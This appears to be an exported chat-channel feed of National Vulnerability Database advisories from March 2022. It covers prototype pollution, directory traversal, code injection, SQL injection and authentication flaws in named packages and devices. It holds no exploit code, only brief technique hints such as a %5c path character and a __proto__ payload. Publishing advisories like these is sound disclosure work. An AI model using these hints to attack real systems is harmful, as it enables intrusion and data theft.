<div class="pull_right date details" title="17.03.2022 11:21:36">
11:21
</div>
<div class="text">
<strong>‼ CVE-2022-25352 ‼</strong><br><br><code>The package libnested before 1.5.2 are vulnerable to Prototype Pollution via the set function in index.js. **Note:** This vulnerability derives from an incomplete fix for [CVE-2020-28283](https://security.snyk.io/vuln/SNYK-JS-LIBNESTED-1054930)</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25352">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39136">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:37">
11:21
</div>
<div class="text">
<strong>‼ CVE-2022-21221 ‼</strong><br><br><code>The package github.com/valyala/fasthttp before 1.34.0 are vulnerable to Directory Traversal via the ServeFile function, due to improper sanitization. It is possible to be exploited by using a backslash %5c character in the path. **Note:** This security issue impacts Windows users only.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-21221">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39137">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:38">
11:21
</div>
<div class="text">
<strong>‼ CVE-2022-25760 ‼</strong><br><br><code>All versions of package accesslog are vulnerable to Arbitrary Code Injection due to the usage of the Function constructor without input sanitization. If (attacker-controlled) user input is given to the format option of the package's exported constructor function, it is possible for an attacker to execute arbitrary JavaScript code on the host that this package is being run on.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25760">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39138">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:39">
11:21
</div>
<div class="text">
<strong>‼ CVE-2022-25296 ‼</strong><br><br><code>The package bodymen from 0.0.0 are vulnerable to Prototype Pollution via the handler function which could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload. **Note:** This vulnerability derives from an incomplete fix to [CVE-2019-10792](https://security.snyk.io/vuln/SNYK-JS-BODYMEN-548897)</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25296">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39139">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:41">
11:21
</div>
<div class="text">
<strong>‼ CVE-2021-45793 ‼</strong><br><br><code>Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45793">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39140">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:42">
11:21
</div>
<div class="text">
<strong>‼ CVE-2022-0748 ‼</strong><br><br><code>The package post-loader from 0.0.0 are vulnerable to Arbitrary Code Execution which uses a markdown parser in an unsafe way so that any javascript code inside the markdown input files gets evaluated and executed.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0748">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39141">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:43">
11:21
</div>
<div class="text">
<strong>‼ CVE-2021-44259 ‼</strong><br><br><code>A vulnerability is in the 'wx.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When an unauthorized user accesses this page directly, it connects to this device as a friend of the device owner.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44259">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39142">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:44">
11:21
</div>
<div class="text">
<strong>‼ CVE-2022-25354 ‼</strong><br><br><code>The package set-in before 2.0.3 are vulnerable to Prototype Pollution via the setIn method, as it allows an attacker to merge object prototypes into it. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-28273](https://security.snyk.io/vuln/SNYK-JS-SETIN-1048049)</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25354">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39143">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:45">
11:21
</div>
<div class="text">
<strong>‼ CVE-2021-45794 ‼</strong><br><br><code>Slims9 Bulian 9.4.2 is affected by SQL injection in /admin/modules/system/backup.php. User data can be obtained.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45794">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39144">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:46">
11:21
</div>
<div class="text">
<strong>‼ CVE-2021-23556 ‼</strong><br><br><code>The package guake before 3.8.5 are vulnerable to Exposed Dangerous Method or Function due to the exposure of execute_command and execute_command_by_uuid methods via the d-bus interface, which makes it possible for a malicious user to run an arbitrary command via the d-bus method. **Note:** Exploitation requires the user to have installed another malicious program that will be able to send dbus signals or run terminal commands.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23556">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>